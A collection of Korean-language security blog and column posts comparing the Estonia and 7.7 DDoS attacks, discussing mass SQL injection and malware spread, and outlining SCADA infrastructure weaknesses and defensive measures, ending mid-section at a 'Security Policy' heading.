국내 및 해외의 보안 현실과 IT 환경을 맞추어 보면 가난한 기업들은 계속 해서 위험에 노출 되고 여력이 있는 곳들은 빠르게 문제점을 보완하고 비용을 적극 투자한다.  보안 관련된 기업측면에서는 모두가 수익을 창출 할 수 있는 사후 대응에 머물러 있으며 사전 대응과 위험요소에 대한 관리라는 측면에서는 활동이 미미할 뿐이다.

 

오래도록 가지고 있는 잘못된 편견중의 하나는 사고가 발생 한 뒤에야 중요성을 인지한다는 점이다. 그래서 국내외를 막론하고 수없이 많은 보안회사들은 사후대응에만 중점을 두고 있는지도 모른다. 이제 시대는 충분히 바뀌었고 많은 변화가 있었다. 변화를 따라가지 못한다면 소도 잃고 외양간의 기둥마저 무너질 수도 있다.

 

개인 PC를 공격하는 공격도구가 윈도우 시스템에 IE 사용자만으로 한정이 될까? 이미 작은 흐름에서는 타 운영체제 및 별개의 도구를 사용하는 시스템에도 충분한 시도들이 있었고 현재 공격이 눈에 띄게 드러나지 않는 것은 노력 대비 성과가 부족하기 때문일 것이다.

 

가난한 기업과 서비스 운영주체들은 힘이 없다. 역량이 부족하고 전문적인 지식의 도움을 얻고자 해도 돈이 없다. 또 문제를 수정 하고자 해도 어디가 문제인지 어떻게 고치면 되는지에 대한 협력은 절대적으로 부족하다. 비단 국내만의 문제가 아닌 전 세계적인 문제이다.

 

이젠 시대의 흐름에 맞게 변화를 크게 주어야 할 때이다.

 

역량이 있는 기업들 조차도 잦은 횟수로 변경이 되는 웹 서비스의 관리와 보안성에 대해 어려움을 겪고 있는데 하물며 가난한 기업과 서비스들은 무엇을 할 수 있겠는가?

 

국가나 산업차원에서 저렴하고도 신뢰 할 수 있으며 접근성이 높은 서비스는 반드시 제공 되어야만 하고 이제 머지 않아 출현 해야만 현재의 인터넷과 IT 서비스의 위기 상황을 개선 시켜 나갈 수 있을 것이다.

 

 

앞으로 발생 될 수 있는 위험들은 위험수준을 잘 관리하고 있는 기업들에게도 동일한 영향을 미칠 것이다. 대규모 웹 서비스 해킹을 통해 악성코드를 유포하는 행위와 서비스에 공통적인 요소를 공격하여 대규모 유포를 하는 유형으로 나눌 수 있을 것이다.  기발한 공격 기법은 이제 상상력의 한계에만 그치지 않는다.

 

http://www.eweek.com/c/a/Security/Infected-Widget-Compromises-Parked-Domains/

위의 기사는 Network Solution사에서 운영하는 Widget을 해킹하여 악성코드를 유포한 기사이며 현재는 중지 되었지만 단순히 Widget 배포처를 해킹함으로써 최소 50만개에서 최대 500만개 이상의 도메인을 통해 악성코드가 유포 되었음을 보여 준다.

 

빈익빈 부익부의 틀은 IT사회에서도 정확하게 적용이 된다.

그러나 이제 피해는 빈자와 부자를 가리지 않을 것이다.

시스템과 체계를 정비 하지 않는다면 앞으로도 오랜 기간 지속 될 수 밖에 없다.

 

특정 서비스의 구조적인 문제를 공격하는 웜이나 공격코드들은 2005년부터 있어 왔다. 앞으로 트위터나 페이스북의 서비스에서 문제가 생긴다면 그 피해 대상은 얼마나 될까? 더불어 공격코드가 스마트폰별 공격코드와 OS별 공격코드를 가지고 있을 때 피해 양상은 얼마나 될까?

 

상상하기 어려울 것이다. 그러나 아무도 눈을 뜨고 보려 하지 않는다.

 

빈자를 위한 도구가 결국엔 모든 것을 살리게 될 것이다. 거기에서부터 시작을 해야 하는데 아직 세계는 손쉽게 정보를 얻고 일정 수준이상의 기본지식이 필요함을 인식하지도 못하고 있다.

 

다음 블로그 글은 아마도 구조적 해킹 ( 일반적으로 서비스 어뷰징으로 불리워 지는 것)에 대한 것과 국외기업들의 서비스 연관, 악성코드와의 관련 등에 대해서 한번 정리해 볼 생각이다.

 

 

 -twitter: @p4ssion  -바다란 세상 가장 낮은 곳의 또 다른 이름

Posted by 바다란

[zdnet 컬럼 게재글입니다.]

DDos
문제의 핵심과 변화 (에스토니아, 7.7) - 바다란

7.7 DDos 관련된 의견들이 1년이 지난 지금 시점에 다시금 많은 분야에서 회자 되고 있다. 문제에 대한 분석과 적절한 대응 체계에 대한 논의가 계속 되고 있는 시점에 DDos 논란의 핵심은 무엇인가 하는 명제에 대해서 명확한 설명은 아직 잘 설명 되지 않고 있는 듯 하다.

 

DDos에 대한 핵심적인 이해 분야에 대한 접근 방법도 상이한 점이 많이 있다. 공격 주체는 분명히 개인의 PC이며 공격을 받는 대상은 기업 및 기관의 서비스를 대상으로 하고 있다. 그러나 현재 논의 되고 있는 대책의 대부분은 공격 받는 대상의 보호대책을 강화하는 측면에만 머물러 있다. DDos 대응 장비의 도입과 체계의 도입은 단기적으로 타당한 방향이다. 그러나 근본적인 원인제거를 하지 않는 다면 미봉책에 머물 뿐이다. 공격자들은 보다 더 많은 공격자원을 더 은밀하게 모집하고 더 대량의 자원을 동원하여 공격을 할 것이다. 실제로 은밀하게 모집 하려고도 하지 않는다. 일반적인 웹 서비스를 해킹하여 악성코드를 사용자 PC에 설치하는 행위는 너무나도 일반적으로 발생하는 현상일 뿐이다.

 

DDos 공격에 대해 보다 더 많은 대응자원을 투입하고 대응 실무인력을 투입하는 것은 무제한적인 공격도구 확보가 가능한 공격자들에 비한다면 수술이 필요한 환자에게 붕대만을 처방하는 행위가 될 뿐이다.

 

비근한 예로 2007년에 발생된 에스토니아의 DDos 사례와 7.7 DDos의 차이점에 대한 근본적인 고찰도 부족한 현 상황에서 대책이라는 부분은 지속되는 공격에 대한 소모성 대책과 다를 바가 없다.

본 컬럼에서는 근본적인 DDos 공격의 변화를 간략하게 살펴 보고 앞으로의 대응에 중점이 되어야 할 부분에 대해서 짚어 볼 수 있도록 한다.

 

먼저 에스토니아를 향한 공격의 전체적인 동향은 다음과 같다.

 

사용자 삽입 이미지

일반적인 cyber 공격 유형이라 할 수 있는 통신 대역폭을 가득 채우는 공격과 함께 일반적인 혼란을 초래 할 수 있는 spam메일, Phishing, Web 변조 등이 동시 다발적으로 발생할 것을 확인 할 수 있다.

 

왜 에스토니아는 외부와 완벽하게 고립된 섬처럼 2~3주간에 걸쳐서 지속적인 피해를 입을 수 밖에 없었을까? 그만큼 취약한 국가였을까? 아니면 취약한 대응능력을 지니고 있었을까?

일반적으로 언론 기사를 통해서는 정확한 면모를 확인하는 것이 어렵다. 단순히 작은 국가가 대규모 공격에 의해 대응능력이 없이 무너졌다고 보는 측면이 강하다. 그러나 IT세상에서는 크고 작음의 판단 기준이 영토에 준하지는 않는다. 

 

에스토니아 국가 자체가 IT화를 통해 국가 발전을 도모한 결과 EU NATO 2004년 동시 가입될 정도로 동유럽에서는 발전화된 시도를 많이 한 국가로 볼 수 있다.  또한 전세계 최초로 인터넷을 통한 선거를 실시함으로써 실험적인 시도를 많이 한 동유럽의 정보통신 강국의 하나였다.

왜 동유럽의 정보통신 강국은 고립된 섬이 될 정도로 심각한 피해를 입었을까?

 

사용자 삽입 이미지

<http://www.riso.ee/en/information-policy/projects/x-road>

 

위의 이미지는 에스토니아의 기반 정보 시스템에 대한 간략화된 이미지 이다. X-road라는 정보시스템을 인터넷 기반으로 유지하고 있음을 볼 수 있다. 또한 국가 예산 및 운영에 필요한 가장 자원이라 할 수 있는 인구 통계와 차량등록, 건강보험 관련된 내용이 통합되어 300여 개 이상의 국가기관과 연동되어 서비스 되고 있으며 금융기관과도 연동된 형태로 서비스 되고 있음을 알 수 있다. 각 연결지점에는 해킹이나 데이터 유출에 대비하여 암호화된 지점들을 모두 운영 하고 있음에도 불구하고 연결 자체가 되지 않도록 하는 DDos 공격에는 무차별적으로 무너질 수 밖에 없는 구조를 가지고 있었다.

 

에스토니아의 사례는 국가나 한 산업 자체가 밀접한 연관을 가지고 있고 공개된 통로를 이용할 경우에 치명적인 피해를 입을 수 있는 Cyber war의 전형적인 모습을 관찰 할 수 있다. 이 당시에 활용된 DDos 공격은 일반적인 DDos 공격 세트라고 할 수 있는 각 프로토콜별 자원 고갈형의 공격이 지속 되었으며 공격에 대한 대응은 외부 유입되는 트래픽을 일시적으로 모두 차단 함으로써 일차적인 회복을 할 수 있었다. 국가 내부의 망은 정상화 시킬 수 있었으나 외부와 연결 되는 모든 통로를 차단한 채로 지낼 수 밖에 없어서 고립된 섬으로 불려진 것이다.

 

 

2007년에 발생된 에스토니아의 공격이 일반적인 DDos 공격 이외에도 다양한 공격이 병행되어 진행된 것을 볼 때 이후 3년의 시간이 지난 지금에 이르러서는 더 치명적인 내용으로 전개 될 수 밖에 없음은 명확하다.

 

2009 7.7일에 발생된 DDos 공격의 경우 일반적인 DDos 공격과는 차이점이 존재하고 있으며 그 변화상을 일면 짐작 할 수 있다.  KISA의 자료를 통해 7.7 DDos의 현황을 살펴 보면 다음과 같은 이미지로 간략하게 요약이 된다.

 

사용자 삽입 이미지

< ref: KISA >

 

1, 2, 3차로 세분화된 공격의 특징은 지정된 일시에 지정된 목표를 향해 예정된 공격을 수행 했다는 특징이 있다. 단순한 트래픽 소모를 위한 DDos 공격과는 별개로 서비스 자원 소모를 위한 DDos 공격도 병행되어 활용이 되었으며 해외로부터 유입되는 공격의 경우 손쉽게 차단되는 점을 이용하여 국내에 존재하는 대량의 좀비PC를 활용 했다는 점이 눈에 띄게 달라진 점이라고 판단된다. 

 

일반적인 DDos 발생시에 대응은 좀비PC를 조종하는 C&C ( Command & Control) 서버를 찾아 연결을 차단함으로써 좀비 PC에 설치된 공격도구를 무력화 시키는 방식으로 진행이 이루어 진다. 그러나 7.7 에서는 왜 예정된 3일의 공격을 무력화 시키지 못했을까?

 

그 이유는 이미 3일간의 공격이 세분화 되어 예정이 되어 있었기 때문이며 좀비 PC를 직접 통제하는 형태가 아닌 좀비 PC에서 명령이 존재하는 서버로 연결을 하고 추가적인 명령을 확인 하는 형태로 구성이 되어 있기 때문이다.

 

중요한 차이점은 기존의 DDos 공격 방식에 대한 대응으로는 어려울 수 밖에 없는 이미 예정된 공격이었다는 점이다.

 

사용자 삽입 이미지

간단하게 정리한 DDos 형태의 변화이다.

DDos 공격 유형은 공격 형태에 따라 기술적인 분류가 가능하나 현재 나타난 여러 유형의 DDos 현상을 형태적으로 분석해 보면 연결타입과 공격유입소스라는 부분을 통해 구분을 할 수가 있다. 각 연결 형태와 공격유입 소스의 출발점에 따라 대응은 모두 달라질 수 밖에 없다.

 

에스토니아

연결타입 : Active – 해외의 Botnet을 이용한 공격

공격유입소스: Outside – 해외에 존재하는 좀비 PC 활용

 

일반적 DDos

연결타입: Active – Botnet을 이용한 공격

공격유입소스: Inside – 국가 내의 PC를 공격하여 획득한 좀비 PC Agent를 활용한 봇넷 공격 (알려진 유형의 공격이 일반적임)

7.7 DDos

연결타입: Semi Active – Botnet C&C 서버가 직접 통제하는 것이 아닌 좀비PC들이 여러 서버들에 접근하여 공격정보를 획득하는 유형

공격유입소스: Inside – 국가내의 PC를 공격하여 좀비 PC 획득 (알려지지 않은 유형의 공격 기법 사용으로 사전탐지 안되었음)

각 형태별 대응방식의 변화를 간단하게 도식화 하면 다음과 같다.

사용자 삽입 이미지

 

DDos 공격에 대한 기본적인 기술대응은 논외로 하더라도 형태의 변화에 따른 심각성은 충분하게 나타난다고 볼 수 있다. 백신에서 사전탐지가 되지 않는 Malware성의 도구 유포와 반능동방식의 조정을 통한 공격 효과는 7.7 DDos에서 보듯이 명확한 효과를 나타내고 있다. 만약 1년이 지난 지금 시점에도 동일한 공격이 더 대규모로 발생 된다면 기술적인 대응을 일정수준 이상 끌어 올린 기업들 조차도 어려움을 겪을 수 밖에 없을 것이다.

 

근본적으로 DDos 대응의 과제는 이제 일반적인 PC 환경을 얼마나 클린하게 만들고 사전에 위험을 인지 할 수 있고 또 즉각적인 협력과 대응을 통해 피해를 최소화 할 수 있느냐 하는 점에 집중이 되어야 한다.

 

24시간이 지나면 몇 만대 이상의 웹서비스들이 자동화된 도구에 의해 해킹을 당하고 악성코드를 유포하는 상황에서 좀비 PC의 확보는 더 이상 어려운 일도 아니고 너무나도 쉬운 과제임에는 명확하다. 근본적으로 악성코드가 손쉽게 퍼지는 환경을 개선하는 것이 가장 시급한 과제이며 대응장비의 증설과 대응인력의 확대는 눈 앞의 위험만을 피하고자 하는 대책일 뿐이다. 근본 환경의 개선은 현상적인 문제가 드러난 7.7 이후 달라진 점은 없다고 본다.

 

앞으로도 근본 환경의 개선 없이는 사태는 점차 심각한 국면으로 진입 할 수 밖에 없을 것이다.

다음 컬럼에는 Mass sql injection에 대한 컬럼을 게재할 예정이다.

 

* 좀 더 상세한 자료 및 관련 발표 자료는 블로그에서 찾을 수 있습니다.

http://p4ssion.tistory.com/entry/에스토니아-77-DDos-그리고-미래

http://p4ssion.tistory.com/attachment/cfile10.uf@165F670E4C16F178AE44ED.pdf  <- 발표자료

twitter:  @p4ssion

Posted by 바다란




급하게 땜빵으로 ( 전문? ) 맡아서 휴가중에 발표자료 작성 했습니다.
중요한 포인트 하나 정도만 알려 드리고 싶어서 정리를 하긴 했는데 하고 보니 ^^;
 
포인트 하나는 이겁니다. 공격의 변화를 보라는 거죠.
 
에스토니아 : Outside , Active
7.7 : Inside , Semi Active
 
이후의 방향은 효과를 주려면 7.7의 방향이 확실하게 사용이 될겁니다.
지금 언론에서 나오는 에스토니아 스타일 ( Outside , Active - Botnet) 은 절대 위협이 안되는 거죠.
왜냐.. 차단하면 끝이니깐.. - 여러 단계별 감쇄 방안들이 많이 있습니다. sinkhole 이라든지 IDC 단위의 대책들도 많이 있는 상태죠.
 
그러나 내부에서 발생하는것은 어떻게 할까요?
차단을 무슨수로 합니까? 이건 Botnet C&C (조정 서버)를 차단하는 것 외에는 방안이 없습니다.
 
Semi Active란 의미는 조정서버가 없다는 이야기죠. 반능동 이라고 봐야 됩니다.
초기에는 어느정도 Active한 연결이 되나 연결이 안될 경우에는 자체적으로 반응을 하는거죠.
 
내부에서 공격을 하려면 국내의 좀비 PC들을 많이 수집해야 합니다. 수집이 어렵냐구요? 매우 쉽습니다.
얼마전 제레미 님이 블로그에 간략히 언급한 Mass sql injection은 지금도 엄연한 사실입니다.
정확한 통계인지는 모르겠으나 국내에서 주간 단위로 악성코드를 유포하는 웹 URL이 만여개가 넘더군요. ( Ahnlab 통계) .
 
이 통계가 알려진 유형들만 제한된 범위에서 탐지된다고 볼때 국내의 현실은 상상을 초월할 정도라고 봐야 됩니다.
이게 엄연한 현실이죠. 돈 있는 회사야 웹방화벽 도입하고 소스코드 컨설팅 받고 3~4개월 이상 소스코드 수정하고 하지만 그렇다고 해결이 되는것도 아니죠.
(웹 사이트 개편 안합니까? 코드 수정 한번도 없다고 보장 할 수 있습니까? )
 
국내 활성화된 URL이 대략 180~200만개 가량으로 봅니다. 이중 최소치로 잡아 절반 이상은 치명적인 문제점을 가지고 있습니다.
아직 Mass sql 도구가 타 DB 및 개발 언어로까지 적극적으로 확대 되지는 않은 것 같으나 시간 문제죠. 징후도 이미 나오구 있구요.
 
국내의 환경은 이미 초토화 될 때까지 진행된 상태입니다.
알고서도 이야기를 안하는 건지 몰라서 이야기를 못하는 것인지 모르겠으나 현실 인식은 명확해야죠.
 
해결 방안은 몇 해전 부터 계속 주장해 오던 바가 그대로 적용 됩니다.
 
1. 웹사이트의 치명적인 문제점을 손쉽게 찾을 수 있는 접근성 있는 도구의 출현 - 웹 베이스?
 
2. 컨설팅과 같은 주기가 긴 플랜은 비효율적이므로 웹서비스의 문제점을 해결 할 수 있는 빠른 SDLC 점검 패턴의 출현
( 저는 이걸 WDLC라고 부를껍니다. ) 소프트웨어와 서비스는 다른 관점이기에 다른 유형의 점검 패턴이 필요하죠.
이걸 하기 위해서 1번과 같은 도구가 필요한 것이구요.
 
3. 근본적인 문제 해결을 위한 적극적인 노력과 인식 전환 필요 ( 정부?) , 현 상태는 대규모 캠페인으로도 단기 해결이 어려운 정도 입니다.
 
4. 리더쉽 발휘가 가능한 컨트롤 타워의 존재와 수직이 아닌 수평적 관계를 가지고 협력 할 수 있는 전문가 집단의 활성화 ( 공짜로 할려면 될려는 것도 안되겠죠.)
 
5. 여러 문서들에 언급해온 종합적인 해결 및 방안에 대한 노력  ( 요건 많이 써놨습니다. 찾아들 보시길)
 
6.  여러분들의 노력 ^^;
 
 
국내만 이럴까요?
만약 7.7이 미국내의 PC를 동원해서 한국까지도 공격하는 형태가 되었다면 어떻게 되었을까요?
한국은 멀쩡.. 미국은 주요 사이트 초토화 됩니다. 당연한 이야기죠. 이제 사이버전은 시작됩니다.
집단속 제대로 못하면 털리는 건 매 순간이 될껍니다.
 
책임있는 국가기관 모두와 업계가 심각성을 알아야 하고 앞으로가 더 위험하다는걸 알아야 됩니다.
경험을 하고도 지금껏 뭉기적 대는걸 보면 앞으로도 갈 길은 까마득해 보입니다.
 
바다란~
Posted by 바다란
 

바다란 입니다.  색이 다른 부분은 전부 2002년의 공개 문서의 내용을 발췌한 내용입니다. ^^

 

 

<http://movie.naver.com/movie/bi/mi/photo.nhn?code=40133&mb=c&page=1#ps 참고>

 

항간에 다이하드 4.0의 직접적인 해킹 이슈가 화제가 되고 있습니다. 이미 여러 게시물들에서 관련 내용이 언급 되어 추가적인 언급이 불필요한 상황이 되었습니다만 전체적으로 어떤 이슈들이 있는지 살펴 보는 것도 의미 있는 일이 아닐까 생각 됩니다. 지금에 이르러서는 이러한 공격 유형 들이 실제적으로 피해를 입힐 수도 있다고 봅니다. 그렇다면 대응방안은 무엇이고 무엇을 고려해야 하는지에 대해서도 알아야 된다고 생각 됩니다.

 

영화상에서 보면 주요 기반시설(에너지 ,전력 ,교통)에 대한 통제가 나옵니다. 이게 불가능한 것이냐? 그렇지 않다고 봅니다.

간단한 예들도 이미 존재하고 있으며 그만큼 위험한 상황속에서 ( 몇몇만 인지하는 위험) 불안한 안정상태를 유지하고 있다고 봅니다.  실제로 IT화로 집중화된 통제방안을 도입하여 운영할 경우 영화상에서 나온 위험에 직접 노출이 될 수도 있다고 봅니다. 별도의 네트워크망이라 하여도 어딘가에는 연결이 가능한 접점이 존재하고 사용자의 PC를 공격하던 어떤 유형이든 접근 가능한 경로가 존재 할때에 반드시 발생될 문제입니다.  예전의 간단한 기반시설의 위험에 대한 예를 들면 다음과 같습니다.

 

침해사례

------------------

1.Counterterrorism analysts have known for years that terrorists often prepare for attacks with elaborate "targeting packages"of photographs and notes. But, in January, U.S. forces in Kabul, Afghanistan, found something new. A computer seized at an al Qaeda office contained models of a dam, made with structural architecture and engineering software, that enabled the planners to simulate its catastrophic failure. Bush administration officials, who discussed the find, declined to say whether they had identified a specific dam as a target. The FBI reported that the computer had been running Microstran, an advanced tool for analyzing steel and concrete structures; Autocad 2000, which manipulates technical drawings in two or three dimensions; and software "used to identify and classify soils,"which would assist in predicting the course of a wall of water surging downstream. To destroy a dam physically would require "tons of explosives,"Assistant Attorney General Michael Chertoff said a year ago. To breach it from cyberspace is not out of the question.

http://www.washingtonpost.com/ac2/wp-dyn?pagename=article&node=&contentId=A50765-2002Jun26&notFound=true

 

지난 아프가니스탄 전쟁 중 알카에다의 기지로 보이는 곳에서 알카에다 조직원의 소유로 보이는 노트북에서 cyber terror에 이용될 수 있는 소프트웨어와 댐의 모형물을 발견했다. 노트북에서 발견된 소프트웨어는 금속과 콘크리트 구조물을 분석하기 위한 툴인 Microstran 프로그램과 댐의 모형을 2D, 3D 형태로 구축하여 가장 피해를 많이 입히기 위한  물의 흐름을 예상하기 위해 사용한 autocad 2000 프로그램을 발견 하였다. 실제 댐을 폭파 시키기 위해서는 수백톤의 폭약과 삼엄한 경계를 뚫어야 하는 위험 부담이 있었지만  Cyber 에서는 그럴 필요가 없었다.  이 사건을 계기로 지난 9월 경에 발표된 미 대통령 직속의 기반시설 보호팀에 의해 중요기반시설에 대한 보안책을 발표 하게 된 계기로 볼 수 있다.

 

 

2. In 1998, a 12-year-old hacker, exploring on a lark, broke into the computer system that runs Arizona's Roosevelt Dam. He did not know or care, but federal authorities said he had complete command of the SCADA system controlling the dam's massive floodgates. Roosevelt Dam holds back as much as 1.5 million acre-feet of water, or 489 trillion gallons. That volume could theoretically cover the city of Phoenix, down river, to a height of five feet.

http://www.itsa.org/ITSNEWS.NSF/4e0650bef6193b3e852562350056a3a7/3f141fc26dcebd5a85256be600617016?OpenDocument

 

1998 12세의 해커는 장난 삼아  애리조나의 루즈벨트 댐의 컴퓨터 시스템에 침입을 했다. 연방기관은 12세의 해커는 댐의 수문을 조종하는 SCADA system에 대한 완전한 제어 명령을 알고 있었다고 발표했다.  루즈벨트 댐은 489조 갤런의 물을 담고 있었으며  이정도의 양은 400만 이상이 살고 있는 피닉스 시티와 그 일대를 5 피트 정도의 높이로 덮고 흐를 수 있는 양이다.

 

 

3. In Queensland, Australia, on April 23, 2000, police stopped a car and found a stolen computer and radio transmitter inside. Using commercially available technology, Vitek Boden, 48, had turned his vehicle into a pirate command center for sewage treatment. Boden's arrest solved a mystery that had troubled the area's wastewater system for two months. Somehow the system was leaking hundreds of thousands of gallons of putrid sludge into parks, rivers and commercial properties. Until Boden's capture -- during his 46th successful intrusion -- the utility's managers did not know why. Specialists in cyber-terrorism have studied Boden's case because it is the only one known in which someone used a digital control system deliberately to cause harm.

http://www.theregister.co.uk/content/4/22579.html

 

앞의 1,2 번 예는 실행 되기 전의 예이지만  호주의 퀸즈랜드에서 2000 4월에 발생한 사건은 실제적인 SCADA 시스템에 대한 침입으로써 중요한 사례를 제시하고 있다.

 훔친 컴퓨터와 무선전송기와 자동차를 전송매개체로  사용하는 방법을 이용하여  폐기물 처리 회사의 자동화된 시스템을 제어하여 호수와 공원 , 상업지역외에 여러 곳을 오염시킨 혐의로 체포 되었다. 체포되기 이전까지  2달 동안 40여회 이상의 침입을 하여  폐기물을 싣고 가는 차량을 제어하여 폐기물을 쏟아 붓도록 만들었는데 시스템 관리자는 이런 침입 사실 조차도 몰랐다고 한다.  이 경우는  성공한  제어시스템에 대한  첫번째 공격으로 기록되어 있으며 앞으로 많은 사건들이 일어날 가능성을 예고하고 있다.

------------------

 

추가적으로 4번의 예를 들면 올해들어 발생된 에스토니아의 경우를 들 수 있습니다.

http://www.hankyung.com/news/app/newsview.php?aid=2007062556301

소국이다 보니 전체적으로 IT화 비율이 높았는데 대규모 DDos 공격으로 몇 주간 모든 상업 및 경제 활동이 전면마비 상태로 돌입된 기사입니다. 미국의 국토안보부나 FBI에서 분석인력을 파견한다는 기사도 있었습니다.

 

위와 같은 샘플 케이스들이 이미 존재하고 있습니다.  7~8년 전의 상황에서도 이미 문제들이 발견 되었는데 그 동안의 IT 기술의 발전은 전 사회의 영역에 영향을 크게 미치고 있습니다. 변화상도 많고 다양할 것이고 지금에 이르러서는 샘플 케이스 보다 더 심각한 상황들이 다수 나타날 수 있을 것 같습니다.

 

영화에서 나타난 전체적인 컨트롤은 현재 상태에서는 불가능 하나 일부 부분적인 문제들은 나타날 수 있다고 봅니다. 단 환경의 변화에 따라 중앙통제가 일반화될 경우에는 문제의 양상이 달라질 것이고 실제화된 위협으로 나타날 수 있습니다.

 

기반시설을 통제하는 장비들은 일반적으로 DCS SCADA라는 용어로 총칭을 합니다. 예를 들면 Embedded Platform을 사용하는 장비라고 볼 수도 있을 것입니다.  ( DCS: Distributed control system , SCADA: Supervisory Control And Data Acquisition )  영화에 나오는 시설물에 대한 제어는 하위에 존재하는 DCS SCADA를 통제하는 상위 기능에서 사용하는 패널들을 주로 보게 됩니다.

 

기반시설을 통제하는 장비에 대해서 일반인들이 가지는 오해는 다음과 같은 오해가 있습니다.

 

오해

 

1.      제어시스템은 물리적으로 분리된 독자적 네트워크 상에 존재한다

 

일반적으로 분리된 독자적 네트워크 상에 존재하는 것은 사실이다. 그러나 아주 적게나마 원격에서 접속이 가능한 지점이 존재하고 기업정보시스템과의 연동의 필요성으로 인해 통합된 지점이  거의 존재한다.

 

2.      SCADA 시스템과  기업정보 시스템과의 연결에는  강한 접근제어 정책으로 보호되고 있다.

 

대부분의 경우에 SCADA시스템은 방화벽과 보호장치가 이중으로 되어 있는 구조 이나 정보시스템으로부터 혹은 외부로부터 접속이 가능한 몇몇 개의 접속지점이 반드시 존재한다. 중대사고 발생시의 Hot Line 혹은 외부에서 연결을 통한 연결지점, 정보시스템에서 정보의 활용을 위해 제어시스템과 연결이 되는 부분이 반드시 존재한다.

 

3.      SCADA 시스템을 운용하기 위해서는 특별한 지식이 필요하며 침입자가 접근하고 제어하기가 어렵게 만든다.

 

SCADA 시스템의 운영에 사용하는 소프트웨어나 제어장치에 대한 매뉴얼은 이미 전체의 70프로 이상이 인터넷 상에 공개가 되어 있다.  그러므로 이전과 같이  정보가 없어서 지식을 획득하지 못하는 일은 없다.  SCADA시스템을 제작하는 회사는 사후지원과 Update등을 위해 인터넷을 통해 다운로드 받는 형태로 매뉴얼을 제공하는데 이를 통해 충분한 지식의 습득이 가능하다.

 

위의 3가지 경우가 일반인들이 가지는 오해라고 할 수 있습니다. 인터넷이 활발하게 보급 되기 이전에야 별도의 Protocol과 외부와 격리된 구조에서 드러날 문제는 내부자에 의한 문제 사례외에는 없었으나 이제는 외부로 부터도 안전하지 못하다고 볼 수 있습니다.

 

그렇다면 SCADA & DCS로 구성되는 기반시설 운영시스템들의 문제점은 무엇이 있을까요?

 

 

l기반시설 취약성   

 

대표적인 취약성 항목은  항목별로 보면 다음과 같다.

 

l취약한 접근제어

l취약한 인증모드

l부적절한 서버간 혹은 시스템간의 트러스팅

l보안에 취약한 소프트웨어의 사용

l보안이 고려되지 않은 빈약한 시스템의 설계

l적당하지 않은 백업시스템의 사용

 

 

영역으로 나누어 보면 다음과 같이 나눌  있다.

 

-일반적 보안취약성:

 

1.      Web site  외부 공개된 시스템의 경우 침입자에게 회사구조  이름, 이메일 주소, 정보시스템의 이름과 같은 다양한 정보를 제공하고 있다. 사회공학적인 해킹에 의한 침해  개인정보를 이용한 해킹과 바이러스 공격을 당할  있다.

 

2.      DNS Server  Zone-Transfer 허용하는데 IP  서버명 , 이메일 정보를 제공하게 되면  Transfer  가능한 구조로 이루어져 있으므로 획득한 정보를 이용하여 변경이 가능할  있다. 웹사이트를 통하거나 사회공학적인 해킹을 통해 획득한 정보를 이용하여 공격 당할  있다.

 

 

-안전하지 않은 네트워크 구조:

 

1.      FTP, WEB , Mail Server 설정이 부적절하거나 불필요하게 내부정보망에 대한 접근을 허용하는 경우 침해가능성이 존재한다.

 

2.      파트너나 시스템 제작업체와의 네트워크 연결이 방화벽, IDS , VPN 등을 사용하지 않아서 안전하지 않을 경우 우회공격을 통한 침해가능성 존재

 

3.      원격에서 접속하는 다이얼업 모뎀 연결이 불필요하게 허용이  경우

 

4.      서로 다른 네트워크 세그먼트 사이에 분리가 되어 있지 않아서 방화벽이나 네트워크 연결의 통제가 내부적으로 이루어 지지 않을 경우의 취약점

 

 

-실시간 모니터링의 부족:

 

 

1.      많은 네트워크 장비를 이용하다 보니 과다한 로그 발생으로 인하여 중요 정보를 확인하기가 어렵다.

 

2.      IDS  존재하여도  보안관리자는 개별적인 공격만 인지함으로써 종합화 되거나 복잡화된 공격을 인지하지 못하여  위험여부를 판별하지 못한다.

 

 -최근 SCADA 제어 시스템의 변화경향:

                  

1.      User Interface 위해 VB, 델파이 등의 RAD 툴로 개발되는 경향이 많으며 데이터 연결을 위해 ODBC 인터페이스를 이용하는 경우가 많다.

A.     해커나 공격자들이 쉽게 익힐  있다.

2.      기업 정보시스템에 일정부분 연결이 가능하도록 TCP/IP 망을 기본적으로 지원한다.

A.     일반화된 프로토콜이므로 쉽게 접근이 가능하다.

 

전체적인 범주로 보았을때 위의 항목과 같은 문제점들을 가지고 있습니다. 또한 지금에 이르러서는 외부에서의 통제 및 접근 할 수 있는 경로 자체가 더욱 다양해 짐으로 인해 문제는 더 심화 되었다고 보는 것이 정답입니다.

 

 

생활을 영위할 수 있게 해주는 기반시설들에 대한 보안을 위해서는 무엇이 필요할까요?

전체적으로 안정성을 높여주고 위험 포인트를 줄여주는 작업이 진행 되어야 하고 모니터링에 대한 방안이 필요합니다. 보안성 검수 (하드웨어 및 소프트웨어)도 필수적인 부분이 될 것 입니다.

 

대책 방안:

 

SCADA 시스템의 구축 시에 고려해야  사항.

  

1.      현재까지의 관리나 제어 시스템은 폐쇄 환경에 맞추어서 개발이 되어 있으므로 접근제어  인증에 대한  고려가 되어 있지 않다.

현재의 구축 환경은 폐쇄 환경으로 구축되는 경우는 예외적인 경우에만 구축이 되도록 빠르게 변하고 있다.

 

2.      RTU  IED  IP 통신을 지원하는 형태로 변경이 되어가고 단순한 기능에서 점점  많은 기능을 포함해서 복잡해져 가고 있다. 이에 따른 보안구조도 변경 되어야 하나 이에 따른 고려사항은 부족한 현실이다.

 

RTU: remote terminal unit

IED: Intelligent Electronic Device

 

3.      새롭게 나오고 있는 Device Protocol ( ex . UCA /MMS & DNP )  보안기능을 가지고 있고 보안 속성을 지원하는지 여부를 확인

 

OSI 모델을 지원하며 네트워크 연결을 가능하게 해준다.

UCA: Utility communication  Architecture

MMS: Manufacturing Message Specifications

DNP: Distributed Network Protocol

  

4.      Legacy 시스템과의 연결이 필요하므로  보안의 범위를 Legacy 시스템과의 연동까지도 고려하여 구축이 되어야 한다.

  

5.      실시간 정보 제공을 위해 예측 못한 요구 사항이 생길  있으므로 기반구조 설계 시에는  실시간 정보의 제공을 위한 새로운 요구사항과 이에 따른 보안 사항을 다루도록 고려 되어야 한다.

 

6.      침입 탐지 시스템은  제어 Utility Protocol  이해   없다는 것을 알고  보안 구조가 고려 되어야 한다. TCP/IP 망이 아닌 PLC 라인을 이용하여 제어명령이 내려 지므로  침입탐지 시스템에서 찾아내는 패턴과 일치하는 패턴을 찾을  없으며 탐지도 불가능한 형태이다.

 

공개문서에 기술된 보안 강화 대책은 여전히 유효하고 앞으로도 일정기간 유효할 가이드라 할 수 있을 것이다.

 

Security Plan

_____________________________________________________________________________

 

Security Policy

 

